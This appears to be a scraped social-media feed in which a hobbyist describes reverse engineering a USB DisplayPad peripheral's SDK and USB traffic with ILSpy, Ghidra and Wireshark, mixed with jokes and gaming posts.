⛵🔌

isobel @isobel.top [ View ] Jul 04, 2024 at 16:40 UTC

it only took like 40,000 trips to the roundtable hold, but i finally figured out a way to remember which door goes to the blacksmith without me somehow going the wrong way twice fuckin USB ass home base

3 replies 2 reposts 9 likes

⛵🔌 @shadylink.lol [ View ] Jul 05, 2024 at 21:14 UTC

Mmm chicken strips... 🤤

1 replies 0 reposts 1 likes

⛵🔌 @shadylink.lol [ View ] Jul 05, 2024 at 20:17 UTC

So I spent the next hour or so digging into various functions in the DLL and notating which headers are what and ended up with some nicely commented frames in wireshark. Next step is to try and emulate some of these via python in Linux...

0 replies 1 reposts 0 likes

⛵🔌 @shadylink.lol [ View ] Jul 05, 2024 at 20:15 UTC

After some digging in ghidra I narrowed down a couple of consistent functions such as the fun_CRCMessage? that appears to validate/format the message that gets sent to the device. When I saw the CONCAT14(byBrightness,0x312) I got the idea that this might be visible in the pcap and wow! There it is!

1 replies 1 reposts 0 likes

⛵🔌 @shadylink.lol [ View ] Jul 05, 2024 at 20:13 UTC

Starting with ILSpy I can look at the external references to the DisplayPadSDK.dll and see how they're being called and what parameters are being passed. This is useful to me because it tells me how the DLL is being used and what kind of data the .dll is working with.

1 replies 1 reposts 0 likes

⛵🔌 @shadylink.lol [ View ] Jul 05, 2024 at 20:17 UTC

So I spent the next hour or so digging into various functions in the DLL and notating which headers are what and ended up with some nicely commented frames in wireshark. Next step is to try and emulate some of these via python in Linux...

0 replies 1 reposts 0 likes

⛵🔌 @shadylink.lol [ View ] Jul 05, 2024 at 20:15 UTC

After some digging in ghidra I narrowed down a couple of consistent functions such as the fun_CRCMessage? that appears to validate/format the message that gets sent to the device. When I saw the CONCAT14(byBrightness,0x312) I got the idea that this might be visible in the pcap and wow! There it is!

1 replies 1 reposts 0 likes

⛵🔌 @shadylink.lol [ View ] Jul 05, 2024 at 20:13 UTC

Starting with ILSpy I can look at the external references to the DisplayPadSDK.dll and see how they're being called and what parameters are being passed. This is useful to me because it tells me how the DLL is being used and what kind of data the .dll is working with.

1 replies 1 reposts 0 likes

⛵🔌 @shadylink.lol [ View ] Jul 05, 2024 at 20:08 UTC

Okay, here's the scoop on the URB frames... Captured a bunch of stuff with wireshark, in this instance the software is sending commands for a 'device reset'. Thankfully some components of the app are written in .NET so I can run em through ILSpy, this gives me a great starting point in ghidra-

1 replies 0 reposts 0 likes

⛵🔌 @shadylink.lol [ View ] Jul 05, 2024 at 05:04 UTC

Why do they call it freezer when you of the live people in out of in the dead people

0 replies 0 reposts 1 likes

⛵🔌 @shadylink.lol [ View ] Jul 04, 2024 at 05:20 UTC

They have a buy one get one deal on Cyber War.

0 replies 0 reposts 0 likes

⛵🔌 @shadylink.lol [ View ] Jul 03, 2024 at 19:44 UTC

More on this, the device shows up as a W55FA93 Winbond Dev Tool Device. Not much documentation online to go off of unfortunately. There is a block device (/dev/sda) that appears so I imagine it might be some type of SPI flash or whatever. I'm not very smort because I can't get it to do anything!

0 replies 0 reposts 0 likes

⛵🔌 @shadylink.lol [ View ] Mar 13, 2024 at 21:10 UTC

They got him 😭

#lethalcompany #gaming

0 replies 1 reposts 0 likes

⛵🔌 @shadylink.lol [ View ] Jul 03, 2024 at 19:21 UTC

Girl I think you got the wrong end.

0 replies 0 reposts 3 likes

⛵🔌 @shadylink.lol [ View ] Jul 03, 2024 at 19:13 UTC

I noticed there wasn't a reverse engineering feed so I took it upon myself to make one. Feel free to check it out or drop any suggestions!

bsky.app/profile/shad...